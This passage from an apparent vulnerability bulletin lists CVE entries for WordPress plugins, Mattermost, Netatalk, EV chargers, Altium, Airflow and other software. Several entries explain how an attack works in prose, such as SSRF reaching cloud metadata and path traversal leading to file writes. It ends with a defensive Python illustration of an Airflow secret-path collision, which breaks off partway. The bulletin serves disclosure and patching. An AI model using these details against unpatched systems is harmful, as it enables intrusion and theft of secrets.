https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41
 
wpdive–Nexa Blocks Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE The Nexa Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to and including 1.1.1. This is due to the import_demo() function accepting a user-supplied URL in the demo_json_file POST parameter and passing it directly to wp_remote_get() without any URL validation or restriction against internal or private network destinations. The nexa_blocks_nonce required for the AJAX action is publicly exposed in the HTML source of any frontend page where the plugin is active via wp_localize_script on the enqueue_block_assets hook, effectively making the nonce available to all visitors and bypassing any intended authentication barrier. This makes it possible for unauthenticated attackers to make server-side HTTP requests to arbitrary internal or external destinations, potentially exposing internal services, cloud metadata endpoints such as the AWS instance metadata service, localhost services, and other resources not intended to be publicly accessible. A secondary SSRF vector also exists whereby image URLs extracted from the attacker-controlled JSON response are subsequently fetched via a second wp_remote_get() call, allowing chained exploitation through a crafted JSON payload. 2026-05-20 5.4 CVE-2026-6394 https://www.wordfence.com/threat-intel/vulnerabilities/id/b4bb3067-7953-466d-a469-8a101450f133?source=cve
https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L242
https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L242
https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L236
https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L236
https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/classes/enqueue-assets.php#L84
https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/classes/enqueue-assets.php#L84
 
WPFunnels Team–Mail Mint Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPFunnels Team Mail Mint allows Retrieve Embedded Sensitive Data. This issue affects Mail Mint: from n/a through 1.19.5. 2026-05-21 4.3 CVE-2026-27349 https://patchstack.com/database/wordpress/plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-5-sensitive-data-exposure-vulnerability?_s_id=cve
 
wpxpo–FastX The FastX theme for WordPress is vulnerable to unauthorized limited plugin installation and activation due to missing capability checks on the ‘ultp_install_callback’ and ‘ultp_activate_callback’ functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate the PostX plugin. 2026-05-22 4.3 CVE-2026-2518 https://www.wordfence.com/threat-intel/vulnerabilities/id/6f5c4194-4f97-4f85-af90-e983ba9ce3a6?source=cve
https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L264
https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L249
 
wupsales–AI Chatbot & Workflow Automation by AIWU The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘X-Forwarded-For’ header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit. 2026-05-20 6.4 CVE-2026-2955 https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve
https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator
 
xpro–Xpro Addons 140+ Widgets for Elementor The Xpro Addons – 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates. 2026-05-20 5.3 CVE-2025-15369 https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve
https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547
 
yangzongzhuan–RuoYi-Vue A vulnerability was found in yangzongzhuan RuoYi-Vue up to 3.9.2. Impacted is the function FileUploadUtils.upload of the file /common/upload of the component Common Upload Endpoint. Performing a manipulation results in unrestricted upload. The attack can be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 6.3 CVE-2026-9374 VDB-365338 | yangzongzhuan RuoYi-Vue Common Upload Endpoint upload FileUploadUtils.upload unrestricted upload
VDB-365338 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813252 | RuoYi RuoYi-Vue 3.9.2 Cross Site Scripting
 
yog2515–General Options The General Options plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.1.0. This is due to the use of sanitize_text_field() for output escaping in the Contact Number (ad_contact_number) field – a function that strips HTML tags but does not encode double-quote characters to their HTML entity equivalent (&quot;). When the stored value is echoed inside a double-quoted HTML attribute (value="…"), an attacker-supplied double-quote character breaks out of the attribute context. Even with WordPress's wp_magic_quotes mechanism (which prefixes quotes with a backslash), the resulting \" sequence is NOT treated as an escaped quote by HTML parsers – the backslash is rendered as a literal character and the bare double-quote still closes the attribute. This makes it possible for authenticated attackers with Administrator-level access and above to inject arbitrary web scripts in the admin settings page that will execute whenever any administrator visits the General Options settings page. 2026-05-20 4.4 CVE-2026-6399 https://www.wordfence.com/threat-intel/vulnerabilities/id/d29c69bb-4feb-477e-b18f-934ece21aff6?source=cve
https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-main.php
https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-main.php
https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-action.php
https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-action.php
 
ZTE–MU5250 There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface. 2026-05-19 6.3 CVE-2026-44408 https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158
 
ZTE–MU5250 There is an information disclosure vulnerability in ZTE MU5250. Due to improper configuration of the access control mechanism, attackers can obtain information without authorization, causing the risk of information disclosure. 2026-05-22 5.7 CVE-2026-44409 https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3711746568357343342
 
Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source Info Patch Info
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the bot engine's findResult query does not filter results by typebotId, allowing an authenticated user to load result data (user answers, variable values) from a different typebot by supplying a foreign resultId to the startChat endpoint. Exploitation is constrained by CUID2's cryptographically random 24-character IDs (making brute-force infeasible), the requirement that rememberUser be enabled, and the need for matching variable names in the current typebot. If successfully exploited, an attacker can access the original user's previous answers, session variable values, and hasStarted flag, potentially exposing PII like names, emails, and phone numbers. This issue has been fixed in version 3.16.0. 2026-05-22 3.1 CVE-2026-39967 https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-f475-7m4x-m6mx
https://github.com/baptisteArno/typebot.io/commit/73162634e6bdebd37a1a571db4062d30854e0400
https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0
 
Besen–BS20 EV Charging Station A vulnerability was determined in Besen BS20 EV Charging Station up to 20260426. This impacts an unknown function of the component Bluetooth Low Energy Handler. Executing a manipulation can lead to weak password requirements. The attack needs to be done within the local network. This attack is characterized by high complexity. The exploitability is said to be difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." 2026-05-24 3.1 CVE-2026-9394 VDB-365375 | Besen BS20 EV Charging Station Bluetooth Low Energy weak password
VDB-365375 | CTI Indicators (IOB, IOC, TTP)
Submit #813569 | Besen EV Charging Station BS20 EV Charger Weak Authentication
https://github.com/carfeii/besen#finding-1-weak-authentication-mechanism-in-besen-home-ev-charging-station-via-ble
 
Besen–BS20 EV Charging Station A vulnerability was identified in Besen BS20 EV Charging Station up to 20260426. Affected is an unknown function of the component BLE/UDP. The manipulation leads to insufficiently protected credentials. The attack needs to be initiated within the local network. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." 2026-05-24 3.5 CVE-2026-9395 VDB-365376 | Besen BS20 EV Charging Station BLE/UDP insufficiently protected credentials
VDB-365376 | CTI Indicators (IOB, IOC, TTP)
Submit #813572 | Besen EV Charging Station BS20 EV Charger Insufficiently Protected Credentials
https://github.com/carfeii/besen#finding-2-cleartext-credential-exposure-via-ble-and-udp-in-besen-home-ev-charging-station
 
Besen–BS20 EV Charging Station A security flaw has been discovered in Besen BS20 EV Charging Station up to 20260426. Affected by this vulnerability is an unknown functionality of the component Firmware Version Check. The manipulation results in improper restriction of rendered UI layers. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitation appears to be difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." 2026-05-24 3.7 CVE-2026-9396 VDB-365377 | Besen BS20 EV Charging Station Firmware Version Check ui layer
VDB-365377 | CTI Indicators (IOB, IOC)
Submit #813575 | Besen EV Charging Station BS20 EV Charger Improper Verification of Cryptographic Signature
https://github.com/carfeii/besen#finding-3-firmware-version-check-manipulation-and-ui-spoofing
 
Besen–BS20 EV Charging Station A security vulnerability has been detected in Besen BS20 EV Charging Station up to 20260426. This affects an unknown part of the component BLE/WiFi. Such manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The original disclosure mentions that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." 2026-05-24 3.1 CVE-2026-9398 VDB-365379 | Besen BS20 EV Charging Station BLE/WiFi authentication replay
VDB-365379 | CTI Indicators (IOB, IOC, TTP)
Submit #813577 | Besen EV Charging Station BS20 EV Charger Improper Authorization
https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands
 
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) a Use of a Broken or Risky Cryptographic Algorithm vulnerability in the ssh. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. 2026-05-22 3.6 CVE-2025-46371 https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
 
HCL–BigFix Service Management (SM) HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure “X-Content-Type-Options” header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. 2026-05-20 3.7 CVE-2025-31985 https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144
 
jarrodwatts–claude-hud Claude HUD through 0.0.12, patched in commit 234d9aa, contains a path traversal vulnerability that allows attackers to read arbitrary files by supplying an unvalidated transcript_path value via stdin JSON. Attackers can access any file readable by the process and the file metadata is written to a persistent cache file with insufficient permissions, creating a forensic record of accessed paths that survives process exit. 2026-05-18 3.3 CVE-2026-47091 https://github.com/jarrodwatts/claude-hud/issues/485
https://github.com/jarrodwatts/claude-hud/pull/487
https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30
https://www.vulncheck.com/advisories/claude-hud-path-traversal-via-transcript-path
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to escape some variables that could contain malicious content during error page composition which allows an attacker with access to edit some site configuration to execute some malicious code via injecting some JS as part of those values. Mattermost Advisory ID: MMSA-2026-00622 2026-05-18 3.8 CVE-2026-3495 MMSA-2026-00622
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate that the RefreshedToken differs from the original invite token during remote cluster invite confirmation which allows an authenticated attacker to bypass token rotation and reuse the original invite token via sending a crafted invite confirmation with a RefreshedToken matching the original token. Mattermost Advisory ID: MMSA-2026-00575 2026-05-18 3.7 CVE-2026-4273 MMSA-2026-00575
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to check if `team_id` was being changed when updating playbooks, allowing users with only the `Manage Playbook Configurations` permission to change a playbook's team, bypassing the manage members restriction via the PUT API. Mattermost Advisory ID: MMSA-2025-00552 2026-05-18 3.1 CVE-2026-4286 MMSA-2025-00552
 
Mattermost–Mattermost Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent server-rendered content from closing an underlying application view in the Mattermost Desktop App which allows a malicious server or plugin to crash the desktop client via invoking `window.close()` in the renderer context, leading to a denial of service condition at the client level. Mattermost Advisory ID: MMSA-2026-00633 2026-05-18 3.5 CVE-2026-4643 MMSA-2026-00633
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate the Host header when constructing response URLs for custom slash commands which allows an authenticated attacker to redirect slash command responses to an attacker-controlled server via a spoofed Host header. Mattermost Advisory ID: MMSA-2026-00582 2026-05-18 3.5 CVE-2026-6333 MMSA-2026-00582
 
Mattermost–Mattermost Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to enforce client identity binding during the OAuth authorization code redemption flow which allows an authenticated OAuth client to redeem authorization codes issued to a different client via a crafted token exchange request. Mattermost Advisory ID: MMSA-2026-00570 2026-05-18 3.1 CVE-2026-6334 MMSA-2026-00570
 
n/a–JeecgBoot A vulnerability has been found in JeecgBoot 3.9.1. This issue affects some unknown processing of the file /openapi/call/ of the component OpenAPI Endpoint. Such manipulation leads to improper authentication. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 3.7 CVE-2026-9373 VDB-365337 | JeecgBoot OpenAPI Endpoint call improper authentication
VDB-365337 | CTI Indicators (IOB, IOC, IOA)
Submit #813251 | jeecgboot JeecgBoot 3.9.1 Improper Authentication
 
n/a–vBulletin A vulnerability was found in vBulletin 6.x. This impacts an unknown function of the component Login. Performing a manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. VulDB is withholding an extended redistribution of exploit details to prevent simplified exploitation. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 3.5 CVE-2026-9357 VDB-365320 | vBulletin Login cross site scripting
VDB-365320 | CTI Indicators (IOB, IOC, TTP)
Submit #813052 | Cross Site Scripting in the vBulletin 6.xx forum Vbulletin 6.x.x Cross Site Scripting
 
NeoRazorX–facturascripts FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie’s value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8. 2026-05-18 3.9 CVE-2026-27964 https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c
https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd
 
Netatalk–Netatalk A dead bounds check in the Spotlight RPC unmarshaller in Netatalk 3.0.0 through 4.4.2 results in an unreachable code path that provides no effective bounds protection, which may allow a remote authenticated attacker to obtain limited information via crafted Spotlight RPC requests. 2026-05-21 3.1 CVE-2026-44057 Netatalk Security Advisory CVE-2026-44057
 
Netatalk–Netatalk A race condition in the privilege toggle mechanism in Netatalk 2.2.5 through 4.4.2 allows a local attacker to obtain limited information, modify limited data, or cause a minor service disruption. 2026-05-21 3.9 CVE-2026-44059 Netatalk Security Advisory CVE-2026-44059
 
Netatalk–Netatalk An off-by-two error in lp_write() in papd in Netatalk 2.0.0 through 4.4.2 allows an adjacent network attacker to modify limited data or cause a minor service disruption via crafted print data. 2026-05-21 3.7 CVE-2026-44065 Netatalk Security Advisory CVE-2026-44065
 
Netatalk–Netatalk A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data. 2026-05-21 3.7 CVE-2026-44067 Netatalk Security Advisory CVE-2026-44067
 
Netatalk–Netatalk An integer underflow in the volxlate function in Netatalk 3.0.0 through 4.4.2 allows a local privileged user to obtain limited information, modify limited data, or cause a minor service disruption via crafted volume translation input. 2026-05-21 3.4 CVE-2026-44069 Netatalk Security Advisory CVE-2026-44069
 
Netatalk–Netatalk An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests. 2026-05-21 3.1 CVE-2026-44070 Netatalk Security Advisory CVE-2026-44070
 
Netatalk–Netatalk Netatalk 3.1.2 through 4.4.2 is compiled without FORTIFY_SOURCE, which disables built-in buffer overflow detection at runtime, potentially allowing a remote attacker to cause a minor denial of service via memory errors that would otherwise be caught and safely terminated by runtime protection. 2026-05-21 3.7 CVE-2026-44071 Netatalk Security Advisory CVE-2026-44071
 
Netatalk–Netatalk Netatalk 2.1.0 through 4.4.2 combines multiple errno values using bitwise OR, resulting in incorrect error codes when multiple error conditions occur simultaneously, which may allow a remote attacker to cause a minor service disruption via conditions that trigger incorrect error-handling paths. 2026-05-21 3.7 CVE-2026-44074 Netatalk Security Advisory CVE-2026-44074
 
Netatalk–Netatalk A missing break statement in DSI OpenSession processing in Netatalk 1.5.0 through 4.4.2 causes a DSIOPT_ATTNQUANT switch case to fall through into DSIOPT_SERVQUANT, resulting in unintended session option handling that may allow a remote attacker to cause a minor service disruption via crafted DSI session options. 2026-05-21 3.7 CVE-2026-44075 Netatalk Security Advisory CVE-2026-44075
 
Netatalk–Netatalk A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing. 2026-05-21 3.1 CVE-2026-7835 Netatalk Security Advisory CVE-2026-7835
 
Netatalk–Netatalk An incorrect calculation in the hextoint macro in Netatalk 2.0.0 through 4.4.2 due to improper uppercase character handling allows a remote authenticated attacker to cause limited data modification via crafted hexadecimal input. 2026-05-21 3.1 CVE-2026-7836 Netatalk Security Advisory CVE-2026-7836
 
Netatalk–Netatalk A time-of-check time-of-use (TOCTOU) condition in the ad_flush function in Netatalk 3.0.0 through 4.4.2 involves root-privileged file operations, which may allow a remote attacker to cause limited data modification under specific race conditions. 2026-05-21 3.7 CVE-2026-7837 Netatalk Security Advisory CVE-2026-7837
 
Netatalk–Netatalk Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions. 2026-05-21 2.5 CVE-2026-44072 Netatalk Security Advisory CVE-2026-44072
 
OpenHarmony–OpenHarmony in OpenHarmony v6.0 and prior versions allow a local attacker to cause DoS. 2026-05-19 3.3 CVE-2026-25110 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md
 
OpenHarmony–OpenHarmony in OpenHarmony v6.0 and prior versions allow a local attacker to cause DoS. 2026-05-19 3.3 CVE-2026-27781 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md
 
OpenHarmony–OpenHarmony in OpenHarmony v6.0 and prior versions allow a local attacker to cause DoS. 2026-05-19 3.3 CVE-2026-28751 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md
 
OpenHarmony–OpenHarmony in OpenHarmony v6.0 and prior versions allow a local attacker to cause DoS. 2026-05-19 3.3 CVE-2026-33565 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md
 
opensourcepos–Open Source Point of Sale A flaw has been found in opensourcepos Open Source Point of Sale up to 3.4.2. Impacted is the function Login of the file app/Models/Employee.php of the component Employee Login. This manipulation causes use of a weak hash. Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. The vendor explains: "[T]he code is still there to allow the upgrade path to work. The default password is initially seeded with the old hash function, but then migrated to a newer one after login. [T]he hash version check might be cleaned up in the future. Currently it's not actively in use as any password change will use a newer hash function." 2026-05-18 3.7 CVE-2026-8803 VDB-364436 | opensourcepos Open Source Point of Sale Employee Login Employee.php login weak hash
VDB-364436 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #802561 | opensourcepos Open Source Point of Sale 3.4.1 Weak Encoding for Password
 
QuantumNous–new-api A security vulnerability has been detected in QuantumNous new-api up to 0.12.1. This affects the function RelayMidjourneyImage/GetByOnlyMJId of the file router/relay-router.go of the component Midjourney Image Relay Endpoint. Such manipulation leads to authorization bypass. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 3.7 CVE-2026-9306 VDB-365253 | QuantumNous new-api Midjourney Image Relay Endpoint relay-router.go GetByOnlyMJId authorization
VDB-365253 | CTI Indicators (IOB, IOC, IOA)
Submit #812196 | QuantumNous new-api 0.12.1 Authorization Bypass Through User-Controlled Key (CWE-639)
https://gist.github.com/YLChen-007/13974ead25fc6dac42fd7bac62fbb2df
 
RsyncProject–rsync Rsync versions before 3.4.3 contain an off-by-one out-of-bounds stack write vulnerability in the establish_proxy_connection() function in socket.c that allows network attackers to corrupt stack memory by sending a malformed HTTP proxy response. Attackers can exploit this by positioning themselves between the client and proxy or controlling the proxy server to send a response line of 1023 or more bytes without a newline terminator, causing a null byte to be written to an out-of-bounds stack address when the RSYNC_PROXY environment variable is set. 2026-05-20 3.1 CVE-2026-45232 https://github.com/RsyncProject/rsync/security/advisories/GHSA-8f85-j2cv-59m8
https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
https://www.vulncheck.com/advisories/rsync-off-by-one-stack-write-via-http-proxy
 
SourceCodester–SUP Online Shopping A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file /admin/productedit.php. The manipulation of the argument productName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. 2026-05-24 2.4 CVE-2026-9377 VDB-365340 | SourceCodester SUP Online Shopping productedit.php cross site scripting
VDB-365340 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813270 | sourcecodester SUP Online Shopping Project V1.0 Cross Site Scripting
https://github.com/redshadowword-cell/CVE/issues/13
https://www.sourcecodester.com/
 
SPIP–SPIP action/cookie.php in ecrire in SPIP before 4.4.15 is prone to an open redirect vulnerability. 2026-05-24 3.5 CVE-2026-48832 https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-15.html?lang=fr
https://git.spip.net/spip/spip/-/commit/75629034697ab52a963a340afd10930407e1cd55
https://git.spip.net/spip/ecrire/-/commit/a22cb8a56f1e37ff3854b73ff3f66aa3df47070a
 
ulisesbocchio–jasypt-spring-boot A weakness has been identified in ulisesbocchio jasypt-spring-boot up to 3.0.5/4.0.4. Affected by this vulnerability is the function getSecretKeySaltGenerator of the file jasypt-spring-boot/src/main/java/com/ulisesbocchio/jasyptspringboot/encryptor/SimpleGCMConfig.java of the component Password Hash Handler. Executing a manipulation can lead to use of a one-way hash with a predictable salt. The attack can be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. 2026-05-24 3.7 CVE-2026-9370 VDB-365333 | ulisesbocchio jasypt-spring-boot Password Hash SimpleGCMConfig.java getSecretKeySaltGenerator hash predictable salt
VDB-365333 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #813198 | Ulises Bocchio jasypt-spring-boot 3.0.0 to 4.0.4 Cryptographic Issues
https://github.com/ulisesbocchio/jasypt-spring-boot/issues/431
https://github.com/dntyfate/cve/issues/3
https://github.com/ulisesbocchio/jasypt-spring-boot/
 
Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source Info Patch Info
9front–9front Mothra would respect a default value given by a website for HTML file upload forms. An attacker could craft a website with a malicious default file path, and then conceal this form element. 2026-05-22 not yet calculated CVE-2026-9053 https://git.9front.org/plan9front/9front/d145acc9ef0da47131af6ad94e87264e04870d47/commit.html
 
9front–9front An attacker sending tcp, il, rudp, rudp, or gre packets with a length less than the header size would trigger a kernel panic. 2026-05-22 not yet calculated CVE-2026-9054 https://git.9front.org/plan9front/9front/7838d68969549f938cc8e80c0c2b4218cb12805c/commit.html
https://git.9front.org/plan9front/9front/f86917b75e9562f90545b7e484dbdcd748236952/commit.html
https://git.9front.org/plan9front/9front/70c97c334171c715df82774d1a47638abaca2db4/commit.html
 
Advantech–WebAccess/SCADA 8.0-2015.08.16 Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component. 2026-05-22 not yet calculated CVE-2026-36226 https://github.com/NullByte8080/CVE-2026-36226
 
Altium–Altium 365 A missing authentication vulnerability exists in the Altium 365 SearchService. A legacy SOAP endpoint exposes search index operations without requiring authentication, session tokens, or any form of identity verification. An unauthenticated network attacker who can reference a target workspace’s identifier can interact with that workspace’s search index, crossing tenant boundaries. Successful exploitation allows reading a workspace’s indexed contents (such as component data, project and folder names, and user metadata) and injecting, modifying, or deleting search index entries. These operations affect the search index only, not the underlying vault data, but they can disclose sensitive workspace information and compromise the integrity and availability of search results. Altium 365 cloud deployments are affected; on-premise Altium Enterprise Server is not affected. 2026-05-21 not yet calculated CVE-2026-9152 https://www.altium.com/platform/security-compliance/security-advisories
 
Altium–Altium Enterprise Server A path traversal vulnerability exists in the Altium Enterprise Server ComparisonService due to missing filename sanitization in the Gerber file upload APIs. A regular authenticated workspace user can supply a crafted filename in the multipart Content-Disposition header to escape the intended temporary upload directory and write arbitrary files to any location on the server filesystem. Because content-controlled files can be written to web-accessible directories, this can be escalated to remote code execution in the context of the service account. It can also be used to overwrite application binaries or configuration files, leading to service takeover or denial of service. 2026-05-20 not yet calculated CVE-2026-9102 https://www.altium.com/platform/security-compliance/security-advisories
 
Altium–Altium Enterprise Server A path traversal vulnerability exists in the Altium Enterprise Server Viewer StorageController due to improper handling of file path route parameters. On on-premise deployments that use local filesystem storage, a regular authenticated user can supply a URL-encoded absolute path (such as an encoded drive letter) in a Viewer storage API request, causing the configured storage root to be discarded and allowing arbitrary files to be read from the server filesystem. Because the readable files include the server’s master configuration, which stores database credentials, signing key locations, certificate passwords, and OAuth secrets, exploitation can lead to disclosure of all server secrets and full compromise of the server and its data. Cloud deployments are not affected, as they use object storage and do not enable this component. 2026-05-20 not yet calculated CVE-2026-9129 https://www.altium.com/platform/security-compliance/security-advisories
 
AMD[.]com–AMD EPYC 4004 Improper input validation in the System Management Mode (SMM) communications buffer could allow a privileged attacker to perform an out of bounds read or write to a limited section of the Top of Memory Segment (TSEG) memory region, potentially resulting in loss of confidentiality or integrity. 2026-05-19 not yet calculated CVE-2024-36343 https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html
https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html
 
Apache Software Foundation–Apache Airflow Amazon provider In the AWS Secrets Manager and SSM Parameter Store secrets backends of `apache-airflow-providers-amazon` prior to 9.28.0, the team-scoping logic could resolve a `conn_id` containing a `/` (e.g. `"my_team/conn"`) to the same path as another team’s team-scoped secret when the caller had no team context. A privileged caller without team context could therefore retrieve another team’s secret by crafting a colliding `conn_id`. Fixed in 9.28.0 by switching the team-scope separator to `–` and rejecting team-shaped `conn_id`s when team context is absent. Affects the experimental multi-tenant teams feature only. Users are recommended to upgrade to `apache-airflow-providers-amazon` 9.28.0, which fixes the issue. 2026-05-19 not yet calculated CVE-2026-42526 https://github.com/apache/airflow/pull/65703
https://lists.apache.org/thread/0092sz5g520d3qqjb01wd61myqlgjtyn
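The collision in the Airflow entry above is easiest to see by building both secret paths. The following is an added illustration, not the provider's code: the `airflow/connections` prefix is a placeholder, the pre-fix shape is reconstructed from the advisory text, and the separator the advisory quotes is rendered here as a double hyphen (an assumption about how it appears in the bulletin).

```python
from typing import Optional

SECRET_PREFIX = "airflow/connections"  # hypothetical Secrets Manager / SSM prefix for this demo
TEAM_SEP = "--"                        # assumption: stands in for the separator quoted in the advisory


def secret_path_before(conn_id: str, team: Optional[str]) -> str:
    """Reconstructed pre-fix shape: the team scope is just one more '/' segment."""
    return f"{SECRET_PREFIX}/{team}/{conn_id}" if team else f"{SECRET_PREFIX}/{conn_id}"


def secret_path_after(conn_id: str, team: Optional[str]) -> str:
    """Fixed shape: team and conn_id share one segment joined by a separator a conn_id may not
    contain, and a conn_id that merely looks team-scoped is refused when there is no team context."""
    if team is None and ("/" in conn_id or TEAM_SEP in conn_id):
        raise ValueError(f"conn_id {conn_id!r} looks team-scoped but the caller has no team context")
    if team is not None and TEAM_SEP in conn_id:
        raise ValueError(f"conn_id {conn_id!r} must not contain {TEAM_SEP!r}")
    return f"{SECRET_PREFIX}/{team}{TEAM_SEP}{conn_id}" if team else f"{SECRET_PREFIX}/{conn_id}"


def collides(conn_a: str, team_a: Optional[str], conn_b: str, team_b: Optional[str], path_fn) -> bool:
    """True when two (conn_id, team) lookups land on the same backend key."""
    return path_fn(conn_a, team_a) == path_fn(conn_b, team_b)


def resolve_or_reject(conn_id: str, team: Optional[str]) -> str:
    """Describe what the fixed logic does with a lookup."""
    try:
        return "path " + secret_path_after(conn_id, team)
    except ValueError as e:
        return "rejected " + str(e)


if __name__ == "__main__":
    # Team "data-eng" owns connection "warehouse"; a caller with no team context asks for
    # the crafted conn_id "data-eng/warehouse" (constructed names).
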